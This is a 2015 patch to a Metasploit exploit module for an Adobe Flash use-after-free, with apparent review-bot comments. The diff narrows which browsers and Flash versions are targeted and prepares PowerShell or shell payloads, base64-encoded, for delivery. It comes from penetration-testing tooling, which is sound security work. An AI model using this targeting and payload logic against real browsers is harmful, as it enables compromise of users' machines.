From b9f9647ab1bb6ece994e92c1120cb5b461576072 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 21 May 2015 14:06:41 -0500
Subject: [PATCH] Use all the BES power
---
 .../adobe_flash_uncompress_zlib_uaf.rb | 28 +++++++++++++++----
 1 file changed, 22 insertions(+), 6 deletions(-)
diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
index 3e996bbcbb..774ab5ab27 100644
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@@ -45,16 +45,31 @@ class Metasploit3 < Msf::Exploit::Remote
 'BrowserRequirements' =>
 {
 :source => /script|headers/i,
+ :arch => ARCH_X86,
 :os_name => lambda do |os|
 os =~ OperatingSystems::Match::LINUX ||
 os =~ OperatingSystems::Match::WINDOWS_7
 end,
- :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+ :ua_name => lambda do |ua|
+ case target.name
+ when 'Windows'
+ return true if ua == Msf::HttpClients::IE
+ when 'Linux'
+ return true if ua == Msf::HttpClients::FF
+ end
+
+ false
+ end,
 :flash => lambda do |ver|
- (ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')) ||
- (ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438'))
- end,
- :arch => ARCH_X86
+ case target.name
+ when 'Windows'
+ return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')
+ when 'Linux'
+ return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')
+ end
+
+ false
+ end
 },
 'Targets' =>
 [
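Review bot: In the new `:flash` lambda, `Gem::Version.new(ver)` is guarded only by `ver =~ /^16\./` (or `/^11\./`), so a string that starts correctly but is otherwise malformed raises ArgumentError out of the requirement check instead of returning false. `ver` presumably comes from the browser profile and should be treated as untrusted, so checking `Gem::Version.correct?(ver)` first and anchoring with `\A` rather than `^` would make both branches fail closed. The new lambdas also match `target.name` exactly (`when 'Windows'`), whereas `exploit_template` matches it with a regex (`=~ /Windows/`). The 'Targets' list starts at the end of this hunk and continues outside it, so confirm the names agree. A short comment above `:ua_name`, such as `# requirements below depend on the selected target`, would document the coupling.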
@@ -97,13 +112,14 @@ class Metasploit3 < Msf::Exploit::Remote
 def exploit_template(cli, target_info)
 swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
- target_payload = get_payload(cli, target_info)
 if target.name =~ /Windows/
+ target_payload = get_payload(cli, target_info)
 psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
 b64_payload = Rex::Text.encode_base64(psh_payload)
 platform_id = 'win'
 elsif target.name =~ /Linux/
+ target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
 b64_payload = Rex::Text.encode_base64(target_payload)
 platform_id = 'linux'
 end
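Review bot: The Linux branch now requests its payload with `target_info.merge(arch: ARCH_CMD)` while 'BrowserRequirements' in the same file pins `:arch => ARCH_X86`, and nothing in the hunk says why the two differ. A comment above that line, for example `# Linux branch uses a command payload, so override the arch taken from the browser profile`, would record the intent if that is the reason. Separately, the `if`/`elsif` has no `else`, so a target name matching neither regex leaves `target_payload`, `b64_payload` and `platform_id` nil. The rest of `exploit_template` lies outside the hunk, so how those values are used afterwards cannot be checked here.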